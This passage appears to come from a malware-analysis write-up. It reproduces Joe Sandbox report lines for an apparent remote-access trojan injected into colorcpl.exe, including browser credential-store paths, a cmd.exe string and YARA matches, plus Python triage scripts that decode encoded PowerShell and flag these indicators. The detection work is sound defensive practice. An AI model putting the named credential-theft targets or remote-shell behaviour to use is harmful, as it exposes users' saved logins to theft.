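    """Return the decoded -EncodedCommand payload, or None if the line has none / is not base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)          # tolerate stripped padding
    try:
        raw = base64.b64decode(b64)
    except binascii.Error:
        return None
    # The payload is UTF-16LE. Replace, rather than drop, undecodable units so that a
    # case-folded or otherwise mangled blob is still visibly garbage to the analyst.
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdlines):
    """Decode each command line, run the rules, and pull any URLs out of the decoded script."""
    results = []
    for cmd in cmdlines:
        decoded = decode_encoded_command(cmd)
        hits = [name for name, rx in RULES if decoded and rx.search(decoded)]
        urls = URL_RE.findall(decoded) if decoded else []
        results.append({"cmdline": cmd, "decoded": decoded, "rules": hits, "urls": urls})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_CMDLINES):
        print(repr(r["decoded"]), r["rules"], r["urls"])
```

Decode before matching: rules that look for "Add-MpPreference" in the raw command line never see it here, because the raw line contains only base64. The fourth sample shows a related pitfall: base64 is case-sensitive, so a case-folded copy of the command line (as some log pipelines and report views produce) decodes to garbage and matches nothing. Feed the detector the case-preserved command line from the process-creation event.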
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerG,
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managery_IDC
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr]
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managert]
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerspirpcg
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerJ
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7.225:9916
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernfo
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7.225
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp, logs.dat.20.dr Binary or memory string: [Program Manager]
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00435034 cpuid 20_2_00435034
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 14_2_02FF5694
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: GetLocaleInfoA, 14_2_02FFA2F0
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: GetLocaleInfoA, 14_2_02FFA2A4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 14_2_02FF57A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_004520E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_00452097
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_0045217D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 20_2_0040F26B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_0045220A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_0044844E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_0045245A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_00452583
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_0045268A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_00452757
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_00448937
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_00451E1F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 20_2_06C8007C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CC2EF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CC2EA8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CC2F8E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_06CC2C30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_06CB9748
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_06CC349B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_06CC3568
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CB925F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_06CC326B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_06CC3394
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_06CC301B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF8D24 GetLocalTime, 14_2_02FF8D24
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A964 GetUserNameA, 14_2_0300A964
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 20_2_004491DA
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFB224 GetVersionExA, 14_2_02FFB224
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 20_2_0040B59B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 20_2_0040B6B5

Remote Access Functionality

Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 20_2_00405091
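The two blocks above ("Stealing of Sensitive Information" and "Remote Access Functionality") are the lines an analyst actually triages: a Microsoft-signed system binary, colorcpl.exe, carrying browser credential-store paths and a cmd.exe string is the signature of injected RAT code rather than anything colorcpl.exe does on its own. The script below is an added example, not part of the Joe Sandbox report, that parses behaviour lines in the report's own "Source: ... Code function: ..." format and raises that finding automatically. The sample lines are copied verbatim from this report; the rule set (which API names count as host fingerprinting, which path fragments count as credential stores) is my own assumption and deliberately small.

```python
import re
from collections import defaultdict

# Constructed sample: behaviour lines copied verbatim from the report above.
SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A964 GetUserNameA, 14_2_0300A964
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFB224 GetVersionExA, 14_2_02FFB224
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 20_2_0040B59B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 20_2_00405091
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_004520E2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
"""

# One report line: "Source: <process path> <event kind>: <detail>".
# Process paths in this report contain no spaces, so \S+ is enough.
LINE_RE = re.compile(
    r"^Source: (?P<proc>\S+) "
    r"(?P<kind>Code function|Queries volume information|Key value queried): "
    r"(?P<detail>.*?)\s*$"
)
# Joe Sandbox function ids such as 20_2_0040B59B (pid_run_address) that wrap the detail.
FUNC_ID_RE = re.compile(r"\b\d+_\d+_[0-9A-Fa-f]{8}\b")

# Assumed rule set (my choice, not the sandbox's): directories whose binaries are
# Microsoft-signed, path fragments of browser credential stores, and APIs used to
# fingerprint the host. Extend as needed.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
CREDENTIAL_STORE_MARKERS = ("\\login data", "\\mozilla\\firefox\\profiles", "key3.db")
FINGERPRINT_APIS = {"GetUserNameA", "GetVersionExA", "GetLocalTime"}


def parse_events(report_text):
    """Return (process, kind, detail) tuples with the function ids stripped."""
    events = []
    for line in report_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        detail = FUNC_ID_RE.sub("", m["detail"]).strip(" ,")
        events.append((m["proc"], m["kind"], detail))
    return events


def is_windows_system_binary(path):
    """True for anything living under System32 or SysWOW64 (signed OS binaries)."""
    return path.lower().startswith(SYSTEM_DIRS)


def triage(report_text):
    """Map each process path to a list of human-readable findings."""
    findings = defaultdict(list)
    for proc, kind, detail in parse_events(report_text):
        low = detail.lower()
        if kind == "Code function" and any(mark in low for mark in CREDENTIAL_STORE_MARKERS):
            tag = "browser credential store referenced"
            if is_windows_system_binary(proc):
                # A signed OS binary has no business touching Login Data / key3.db:
                # the string lives in code injected into it.
                tag += " by a Windows system binary (likely injected code)"
            findings[proc].append(f"{tag}: {detail}")
        elif kind == "Code function" and detail in FINGERPRINT_APIS:
            findings[proc].append(f"host fingerprinting API: {detail}")
        elif kind == "Code function" and low == "cmd.exe":
            findings[proc].append("embedded 'cmd.exe' string: remote shell capability")
        elif kind == "Key value queried" and detail.endswith("MachineGuid"):
            findings[proc].append(f"machine identifier read: {detail}")
    return dict(findings)


if __name__ == "__main__":
    for proc, hits in triage(SAMPLE_REPORT).items():
        print(proc)
        for hit in hits:
            print("   ", hit)
```

Running it over the sample lines lists colorcpl.exe with three credential-store hits (all marked as injected code because the process is a SysWOW64 binary) plus the cmd.exe string, loader.exe with two fingerprinting APIs, and wscript.exe with the MachineGuid read; the PowerShell volume-information queries produce no finding, which is the right outcome, since those are ordinary .NET assembly loads.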